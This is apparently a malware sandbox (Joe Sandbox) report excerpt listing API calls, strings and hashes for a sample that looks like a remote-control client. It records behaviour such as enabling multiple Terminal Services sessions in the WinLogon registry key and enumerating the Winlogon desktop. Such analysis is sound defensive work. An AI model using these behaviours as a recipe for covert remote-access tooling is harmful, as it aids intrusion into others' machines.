                                                                                                                        • Instruction Fuzzy Hash: 1F2185763006099FD714CF55E994DB2F3A9FB94335B10862AF65A87A90C770BC50CB50
                                                                                                                        APIs
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00B1EFA0
                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00B1EFB8
                                                                                                                        • DestroyIcon.USER32(?), ref: 00B1EFC5
                                                                                                                        • ImageList_GetImageCount.COMCTL32(?), ref: 00B1EFCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: IconImage$List_$CountDestroyExtractReplace
                                                                                                                        • String ID: "
                                                                                                                        • API String ID: 2255942099-123907689
                                                                                                                        • Opcode ID: f480f16653afc0dd0ad20341598d2c82196a07564999c05903b80f3db4dc31fd
                                                                                                                        • Instruction ID: 25c1e6e2b4cdacda590fd8e084e1c99650267fb5354030eda22b74dcea1e0199
                                                                                                                        • Opcode Fuzzy Hash: f480f16653afc0dd0ad20341598d2c82196a07564999c05903b80f3db4dc31fd
                                                                                                                        • Instruction Fuzzy Hash: 8D31D731A052189BDB20DF68DC49BEA73F8EF44310F5046D5EC25D7291EBB4EA85CB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B0C4C0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00B0C4EA
                                                                                                                          • Part of subcall function 00B0C4C0: __wsplitpath.LIBCMT ref: 00B0C504
                                                                                                                          • Part of subcall function 00B0C4C0: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B0C53D
                                                                                                                        • GetComputerNameW.KERNEL32(?,?), ref: 00B0C60E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                        • API String ID: 806825551-1858614750
                                                                                                                        • Opcode ID: 3e9e6ab0ce2f8c350022a60310bba57a01a59a917274e275be150201024acc81
                                                                                                                        • Instruction ID: c9e63783c519bb98951ede5818b2e38ba8b97455eef9d39c6779fa0b838900ae
                                                                                                                        • Opcode Fuzzy Hash: 3e9e6ab0ce2f8c350022a60310bba57a01a59a917274e275be150201024acc81
                                                                                                                        • Instruction Fuzzy Hash: 8E21D77690021597D720AF64CD42ABB7FE4EFA4751F4406A9FC56971C1FB74EA01C390
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf
                                                                                                                        • String ID: %s_%08x%08x
                                                                                                                        • API String ID: 2111968516-3999349378
                                                                                                                        • Opcode ID: 9133816d6056b388234931d3ed96b261e91ebead727ceb47672d7c4a37c4ad8e
                                                                                                                        • Instruction ID: 252b15c567ab4747d06ca8dd9de548526fd4f17902d65c19a2d15e347a00b840
                                                                                                                        • Opcode Fuzzy Hash: 9133816d6056b388234931d3ed96b261e91ebead727ceb47672d7c4a37c4ad8e
                                                                                                                        • Instruction Fuzzy Hash: 1421F9B5B11109AF8B04DF99CC41CABBBFCEF8C214B108199FD09DB761D671AD529BA0
                                                                                                                        APIs
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 00AE4538
                                                                                                                        • GetObjectW.GDI32(00000000,0000005C,?), ref: 00AE4545
                                                                                                                        • _memset.LIBCMT ref: 00AE4564
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Stock_memset
                                                                                                                        • String ID: Courier$Terminal
                                                                                                                        • API String ID: 3401032496-3811170643
                                                                                                                        • Opcode ID: f66685ef0c507d851d789afc9030beae67736bbf474e46f897d7e46aad89ba16
                                                                                                                        • Instruction ID: 2db30a2e7d1424f4f21f56fe6bb4d610231553659530595146f063b5921b4552
                                                                                                                        • Opcode Fuzzy Hash: f66685ef0c507d851d789afc9030beae67736bbf474e46f897d7e46aad89ba16
                                                                                                                        • Instruction Fuzzy Hash: BD1122321007849FD7305F6DC848B67BBA8EF4A370F004719E2A14B2D0D3B8A84DC765
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(shcore.dll,5E06C67B), ref: 00AEE8BE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 00AEE8D2
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AEE91A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: GetDpiForMonitor$shcore.dll
                                                                                                                        • API String ID: 145871493-92391707
                                                                                                                        • Opcode ID: 014f4d1e143dcc1a360316d46fc7853c3ded51cce47e31eef06b9f891734cac6
                                                                                                                        • Instruction ID: 186ddee77c8551367ea4d8e074b99b6b706734f04a955866ffa88b21abd45071
                                                                                                                        • Opcode Fuzzy Hash: 014f4d1e143dcc1a360316d46fc7853c3ded51cce47e31eef06b9f891734cac6
                                                                                                                        • Instruction Fuzzy Hash: F8119431A046599BCB19DF5ADD44AAEBBFCFF85710F014169F815D7390DB749900CB90
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00AE2036
                                                                                                                        • _wcsncpy.LIBCMT ref: 00AE205E
                                                                                                                          • Part of subcall function 00B09850: _malloc.LIBCMT ref: 00B09859
                                                                                                                          • Part of subcall function 00B09850: _memset.LIBCMT ref: 00B09882
                                                                                                                        • wsprintfW.USER32 ref: 00AE2082
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$_malloc_wcsncpywsprintf
                                                                                                                        • String ID: %s.%04d.%s$Client
                                                                                                                        • API String ID: 3126312778-3365126691
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcstok$_malloc
                                                                                                                        • String ID: ,;$..\CTL32\util.cpp
                                                                                                                        • API String ID: 1825977170-923634865
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 00B00EFB
                                                                                                                        • _malloc.LIBCMT ref: 00B00F0A
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 00B00F20
                                                                                                                        Strings
                                                                                                                        • ..\CTL32\NSMString.cpp, xrefs: 00B00EDC
                                                                                                                        • codepage == CP_ACP || codepage == CP_UTF8, xrefs: 00B00EE1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$_malloc
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$codepage == CP_ACP || codepage == CP_UTF8
                                                                                                                        • API String ID: 4030181574-274046628
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B16B8C
                                                                                                                        • _memset.LIBCMT ref: 00B16BA8
                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 00B16BC6
                                                                                                                        • SetMenuItemInfoW.USER32(?,00000000,00000001,00000030), ref: 00B16BEF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$Count_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 162323998-4108050209
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(dwmapi.dll), ref: 00B1A802
                                                                                                                        • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 00B1A81E
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B1A849
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: DwmIsCompositionEnabled$dwmapi.dll
                                                                                                                        • API String ID: 145871493-1198327662
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 00B12354
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • wsprintfW.USER32 ref: 00B12398
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_mallocwsprintf
                                                                                                                        • String ID: %02x$%02x, $..\CTL32\util.cpp
                                                                                                                        • API String ID: 1803455386-1263427399
                                                                                                                        APIs
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000004,?,?), ref: 00AFECC3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFECC9
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,?,?), ref: 00AFECEA
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFECF0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseValue
                                                                                                                        • String ID: Policy
                                                                                                                        • API String ID: 3132538880-4157669408
                                                                                                                        APIs
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000004,?,?,00000000,?,?,00B0E73F,00000000,00AEA1FF), ref: 00B0E6DC
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000000,?,?,00B0E73F,00000000,00AEA1FF), ref: 00B0E6E5
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,?,?,00000000,?,?,00B0E73F,00000000,00AEA1FF), ref: 00B0E712
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000000,?,?,00B0E73F,00000000,00AEA1FF), ref: 00B0E71B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseValue
                                                                                                                        • String ID: Policy
                                                                                                                        • API String ID: 3132538880-4157669408
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000000,?,?,00000847), ref: 00B18A88
                                                                                                                        • wsprintfW.USER32 ref: 00B18A9E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadStringwsprintf
                                                                                                                        • String ID: #%d$..\CTL32\util.cpp$i < cchBuf
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • ExitThread.KERNEL32 ref: 00AFE387
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00AFE3A2
                                                                                                                        • EnumWindows.USER32(Function_0001DA50,00000000), ref: 00AFE3BB
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$EnumExitLocalSleepThreadTimeWindows_mallocwvsprintf
                                                                                                                        • String ID: Kill Thread$StartThread
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B22E27
                                                                                                                        • MessageBoxW.USER32(00000000,?,WINST32,00000000), ref: 00B22E40
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Messagewsprintf
                                                                                                                        • String ID: Invalid Parameter %c%cCommand Line: <%s>Version: %s$V14.10$WINST32
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 00B00E5C
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$IsEmpty()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h
                                                                                                                        APIs
                                                                                                                        • EnumWindows.USER32(Function_0002E090,?), ref: 00B0E792
                                                                                                                        • OpenDesktopW.USER32(Winlogon,00000000,00000000,02000000), ref: 00B0E7B0
                                                                                                                        • EnumDesktopWindows.USER32(00000000,Function_0002E090,?), ref: 00B0E7BF
                                                                                                                        • CloseDesktop.USER32(00000000,?,00B0E7EE), ref: 00B0E7C6
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Desktop$EnumWindows$CloseOpen
                                                                                                                        • String ID: Winlogon
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00B16853
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00B16865
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B16875
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\WinLogon,00000000,0002001F,?), ref: 00B25052
                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,AllowMultipleTSSessions,00000000,00000004,00000000,00000004), ref: 00B25083
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B2508D
                                                                                                                        Strings
                                                                                                                        • AllowMultipleTSSessions, xrefs: 00B2506D
                                                                                                                        • Software\Microsoft\Windows NT\CurrentVersion\WinLogon, xrefs: 00B25041
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID: AllowMultipleTSSessions$Software\Microsoft\Windows NT\CurrentVersion\WinLogon
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(?), ref: 00B042D9
                                                                                                                        • SendMessageW.USER32(?,0000045B,?,00000000), ref: 00B0430D
                                                                                                                        • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 00B0431C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window
                                                                                                                        • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                                                        • API String ID: 2326795674-1196874063
                                                                                                                        • Opcode ID: 708efe076b183dbfc4746de8f242ccb32bf013685f14062cd8296d042ba6fd0c
                                                                                                                        • Instruction ID: 6506489ef5cfd9c6a63f1d6172c0a2da25d3af54064f37fdc775d4cea64b62a5
                                                                                                                        • Opcode Fuzzy Hash: 708efe076b183dbfc4746de8f242ccb32bf013685f14062cd8296d042ba6fd0c
                                                                                                                        • Instruction Fuzzy Hash: 11E0487639071437EA216A66AC06F9F3B5CDB95B21F114061FB08BB1C1DAE8A5014AE9
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,System\CurrentControlSet\Services\pcisys,00000000,00020006,?), ref: 00AFEA29
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,DisplayPath), ref: 00AFEA3C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFEA46
                                                                                                                        Strings
                                                                                                                        • System\CurrentControlSet\Services\pcisys, xrefs: 00AFEA1F
                                                                                                                        • DisplayPath, xrefs: 00AFEA36
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
